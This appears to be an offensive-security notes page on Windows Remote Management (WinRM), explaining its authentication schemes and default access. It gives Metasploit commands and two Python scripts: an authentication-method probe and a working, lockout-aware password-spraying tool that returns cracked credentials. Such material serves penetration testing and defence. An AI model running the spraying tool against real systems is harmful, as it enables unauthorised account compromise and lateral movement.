InfoSec Notes

5985 / 5986 - WSMan

Overview

Windows Remote Management (WinRM) is the Microsoft implementation of the WS-Management protocol, a standard SOAP (Simple Object Access Protocol)-based protocol that allows hardware and operating systems from different vendors to interoperate.

WinRM can be used to perform various management tasks remotely, including, but not limited to, running batch and PowerShell commands or scripts. Communications are performed over HTTP on TCP port 5985 or HTTPS on TCP port 5986, against the /wsman endpoint.

WinRM supports multiple authentication mechanisms:

  • Basic: authentication of local Windows accounts. Credentials are only base64 encoded in the Authorization header, so they are readable by anyone on the path unless HTTPS is used. Basic is disabled on the WinRM service by default;

  • Digest: challenge-response authentication. It is only implemented on the WinRM client side (to talk to non-Windows WS-Management services); the WinRM service itself does not accept it;

  • Negotiate: negotiate authentication (Kerberos when possible, NTLM otherwise) for both local and domain accounts, also known as Windows Integrated Authentication. By default, UAC remote restrictions give local administrators other than the built-in Administrator (RID 500) a filtered token over the network, so only the built-in local Administrator and domain accounts can connect with administrative rights through Negotiate. If the registry value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy is set to 1, all local accounts in the Administrators group can access the service;

  • Client Certificate-based: authentication is made using a client certificate mapped to a local Windows account on the server;

  • Kerberos: Kerberos authentication for domain accounts;

  • NTLM: NTLM authentication for both local and domain accounts;

  • CredSSP: CredSSP authentication for both local and domain accounts. The client delegates its full credentials to the server, which can then reuse them (for instance for a second hop).

Members of the Windows built-in Administrators and Remote Management Users groups are allowed, by default, to access a remote machine through WinRM (permissions of the default Microsoft.PowerShell session configuration):

(Get-PSSessionConfiguration -Name Microsoft.PowerShell).Permission
  NT AUTHORITY\INTERACTIVE AccessAllowed, BUILTIN\Administrators AccessAllowed, BUILTIN\Remote Management Users AccessAllowed

WinRM presents a limited attack surface, with no publicly known vulnerability in the service itself at the time of writing (May 2019), and authentication attempts are subject to the Windows account lockout policies. WinRM is thus mostly useful for lateral movement after an initial account compromise.

Enumerate supported authentication mechanisms

The Metasploit module auxiliary/scanner/winrm/winrm_auth_methods can be used to enumerate the authentication mechanisms, listed above, supported by the remote WinRM service. The module sends an unauthenticated request to the /wsman endpoint and reads the WWW-Authenticate headers of the HTTP 401 answer, one per accepted mechanism.

msf> use auxiliary/scanner/winrm/winrm_auth_methods

May return false negatives on recent and up-to-date WinRM services.
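The same probe without Metasploit, as an added example that is not part of the original note: one unauthenticated POST to /wsman, then the scheme names are pulled out of the WWW-Authenticate headers of the 401 answer. SAMPLE_CHALLENGE is a constructed set of header values for a dry run; the target host and ports are whatever you pass in.

```python
"""Enumerate the authentication mechanisms advertised by a WinRM listener.

An unauthenticated POST to /wsman is answered with HTTP 401 and one
WWW-Authenticate header per scheme the service accepts (Negotiate,
Kerberos, Basic, CredSSP...). This is the same check the Metasploit
winrm_auth_methods module performs. Added example, not code from the
original notes.
"""
import http.client
import ssl
from typing import Iterable, List

# Minimal WS-Management Identify request; it carries no credentials, the
# service only has to see a SOAP envelope to reply with its challenge.
IDENTIFY_BODY = (
    '<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" '
    'xmlns:wsmid="http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd">'
    "<s:Header/><s:Body><wsmid:Identify/></s:Body></s:Envelope>"
)

# Constructed sample of the header values a typical listener returns.
SAMPLE_CHALLENGE = ["Negotiate", "Kerberos", 'Basic realm="WSMan"']


def parse_auth_methods(www_authenticate_values: Iterable[str]) -> List[str]:
    """Return the scheme names found in WWW-Authenticate header values.

    A value may hold a bare scheme ("Negotiate"), a scheme with parameters
    ('Basic realm="WSMan"') or several schemes separated by commas. Tokens
    containing "=" are parameters (realm, nonce...) and are skipped.
    """
    methods: List[str] = []
    for value in www_authenticate_values:
        for part in value.split(","):
            token = part.strip().split(" ", 1)[0]
            if token and "=" not in token and token not in methods:
                methods.append(token)
    return methods


def probe_winrm_auth(host: str, port: int = 5985, use_tls: bool = False,
                     timeout: float = 5.0) -> List[str]:
    """POST once to /wsman without credentials and return the advertised schemes.

    An empty list means the server did not answer 401: the port is not
    WinRM, a proxy answered instead, or the listener did not challenge the
    anonymous request (the false-negative case mentioned above).
    """
    if use_tls:
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE  # WinRM HTTPS listeners are often self-signed
        conn = http.client.HTTPSConnection(host, port, timeout=timeout, context=ctx)
    else:
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request(
            "POST", "/wsman", body=IDENTIFY_BODY,
            headers={"Content-Type": "application/soap+xml;charset=UTF-8",
                     "User-Agent": "Microsoft WinRM Client"},
        )
        resp = conn.getresponse()
        if resp.status != 401:
            return []
        # Several WWW-Authenticate headers are returned; get_all keeps them apart.
        return parse_auth_methods(resp.headers.get_all("WWW-Authenticate") or [])
    finally:
        conn.close()


if __name__ == "__main__":
    import sys
    target = sys.argv[1]
    for port, tls in ((5985, False), (5986, True)):
        try:
            print(f"{target}:{port} ->", probe_winrm_auth(target, port, use_tls=tls))
        except OSError as exc:  # closed port, reset, TLS handshake failure
            print(f"{target}:{port} -> unreachable ({exc})")
```

Only the advertised schemes are listed; whether a given account is actually authorised (Administrators or Remote Management Users membership, LocalAccountTokenFilterPolicy) is a separate check that needs valid credentials.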

Credentials brute forcing

The Metasploit module auxiliary/scanner/winrm/winrm_login can be used to conduct a brute force attack against a WinRM service.

Note that the account lockout policies for either local or domain accounts will apply. A vertical brute force attack (many passwords against one account) will thus most likely result in account lockout. WinRM can however be used for password spraying attacks (a few passwords against many accounts, staying under the lockout threshold); for more information refer to the Active Directory - Password spraying note.

msf> use auxiliary/scanner/winrm/winrm_login
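A lockout-aware spraying loop, added here as an example that is neither the original note's code nor part of the Metasploit module: the lockout threshold and observation window (as reported by net accounts /domain) drive how many passwords are tried per round and how long to wait between rounds, so no account reaches the threshold inside one window. The pywinrm package, the NTLM transport and the sample users, passwords and policy are assumptions made for the example.

```python
"""Lockout-aware password spraying against a WinRM listener.

Instead of many passwords against one account (which trips the lockout
threshold), each round tries at most threshold - 1 passwords against every
user and then waits out the lockout observation window, so no account
accumulates threshold failures inside one window. Added example, not code
from the original notes. The WinRM transport uses the third-party pywinrm
package (an assumption about the environment); it is imported only when a
real attempt is made, so the scheduling logic runs without it.
"""
import time
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Sequence, Tuple


@dataclass
class LockoutPolicy:
    """Values as reported by 'net accounts /domain' on the target domain."""
    threshold: int            # bad logons before lockout; 0 means never lock out
    observation_minutes: int  # time after which the bad-password counter resets


def spray_schedule(passwords: Sequence[str], policy: LockoutPolicy,
                   margin_seconds: int = 60) -> List[Tuple[List[str], int]]:
    """Split the password list into rounds of (passwords, pause_seconds).

    Each round holds at most threshold - 1 passwords (one attempt below the
    lockout threshold for every user) and is followed by a pause of the
    observation window plus a safety margin. The last round has no pause.
    """
    if policy.threshold <= 0:
        per_round = len(passwords) or 1
    else:
        per_round = max(1, policy.threshold - 1)
    rounds: List[Tuple[List[str], int]] = []
    for start in range(0, len(passwords), per_round):
        chunk = list(passwords[start:start + per_round])
        is_last = start + per_round >= len(passwords)
        pause = 0 if is_last else policy.observation_minutes * 60 + margin_seconds
        rounds.append((chunk, pause))
    return rounds


def try_winrm_login(target: str, user: str, password: str,
                    transport: str = "ntlm") -> Optional[bool]:
    """One logon attempt: True if the credential works, False if rejected,
    None if the service could not be reached. Requires pywinrm (assumption);
    domain accounts are given as 'DOMAIN\\user' with the ntlm transport.
    """
    import winrm  # pip install pywinrm
    from winrm.exceptions import InvalidCredentialsError
    try:
        session = winrm.Session(target, auth=(user, password), transport=transport,
                                server_cert_validation="ignore")
        return session.run_cmd("whoami").status_code == 0
    except InvalidCredentialsError:
        return False
    except Exception:  # connection refused, timeout, TLS errors...
        return None


LoginFn = Callable[[str, str, str], Optional[bool]]


def spray(target: str, users: Sequence[str], passwords: Sequence[str],
          policy: LockoutPolicy, login: LoginFn = try_winrm_login,
          sleep: Callable[[float], None] = time.sleep) -> Dict[str, str]:
    """Run the schedule and return {user: password} for every hit."""
    found: Dict[str, str] = {}
    for chunk, pause in spray_schedule(passwords, policy):
        for password in chunk:
            for user in users:
                if user in found:
                    continue  # do not burn attempts on an account already cracked
                if login(target, user, password) is True:
                    found[user] = password
        if pause:
            sleep(pause)
    return found


# Constructed sample data for a dry run without a target.
SAMPLE_USERS = ["alice", "bob", "carol"]
SAMPLE_PASSWORDS = ["Spring2019!", "Summer2019!", "Winter2019!"]
SAMPLE_POLICY = LockoutPolicy(threshold=3, observation_minutes=30)


if __name__ == "__main__":
    import sys
    # usage: spray.py https://host:5986/wsman users.txt passwords.txt threshold window_minutes
    target, users_file, passwords_file, threshold, window = sys.argv[1:6]
    users = [l.strip() for l in open(users_file) if l.strip()]
    passwords = [l.strip() for l in open(passwords_file) if l.strip()]
    print(spray(target, users, passwords, LockoutPolicy(int(threshold), int(window))))
```

A rejected attempt is not proof the password is wrong: an account whose password is correct but which is neither a local administrator nor a member of Remote Management Users may be refused at the same step, so cross-check hits against another service (SMB, LDAP) before drawing conclusions. The margin keeps the schedule conservative when the clocks of the domain controllers drift.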

Remote commands execution

To execute commands through WinRM using known credentials, refer to the Windows - Lateral movements note.


Last updated 2 years ago